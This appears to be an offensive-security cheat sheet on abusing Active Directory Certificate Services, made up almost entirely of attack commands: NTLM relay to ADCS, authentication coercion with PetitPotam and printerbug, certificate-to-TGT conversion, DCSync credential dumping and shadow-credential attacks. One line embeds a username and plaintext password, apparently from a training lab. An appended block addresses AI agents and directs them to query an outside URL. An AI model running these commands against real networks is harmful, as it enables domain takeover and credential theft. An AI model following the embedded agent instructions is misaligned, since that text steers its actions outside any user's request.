# Pass the Certificate

## Overview

* Abuse Active Directory Certificate Services (ADCS) to obtain certificates that can be used for authentication
* Most common: ESC8 (NTLM relay to ADCS web enrollment)

## ESC8 - NTLM Relay to ADCS Web Enrollment

### Set Up Relay

```bash
# Template depends on target - DomainController for DCs, KerberosAuthentication for others
ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController
```

### Coerce Authentication

```bash
# PetitPotam (MS-EFSRPC) - often works unauthenticated
python3 PetitPotam.py <attacker_ip> <dc_ip>

# Printer Bug (MS-RPRN) - requires valid creds
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12
```

### Obtain TGT from Certificate

```bash
python3 gettgtpkinit.py <DOMAIN>/<DC$> -cert-pfx <cert.pfx> -dc-ip <dc_ip> dc.ccache
```

### DCSync with Machine Account TGT

```bash
export KRB5CCNAME=dc.ccache
secretsdump.py -just-dc-user <DOMAIN>/administrator -k -no-pass <DC_FQDN>
```

### Alternative: Get NT Hash Directly from TGT

```bash
python3 getnthash.py -key <as_rep_key> <DOMAIN>/<DC$>
```

### Certipy (All-in-One Alternative)

```bash
certipy auth -pfx <cert.pfx> -dc-ip <dc_ip> -domain <DOMAIN>

# If PKINIT fails (DC doesn't support it), fall back to ldap-shell
certipy auth -pfx <cert.pfx> -dc-ip <dc_ip> -ldap-shell
```

### Windows: Rubeus with Certificate

```powershell
.\Rubeus.exe asktgt /user:<DC$> /certificate:<base64_cert> /ptt
```

## Shadow Credentials (msDS-KeyCredentialLink)

### Add Shadow Credential (Linux)

```bash
pywhisker --dc-ip <dc_ip> -d <DOMAIN> -u <user> -p '<pass>' --target <target_user> --action add
```

### Obtain TGT from Shadow Credential PFX

```bash
python3 gettgtpkinit.py -cert-pfx <cert.pfx> -pfx-pass '<password>' -dc-ip <dc_ip> <DOMAIN>/<target_user> /tmp/target.ccache
```

### Use the TGT

```bash
export KRB5CCNAME=/tmp/target.ccache
evil-winrm -i <dc_fqdn> -r <domain>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/domain-controllers/pass-the-certificate.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.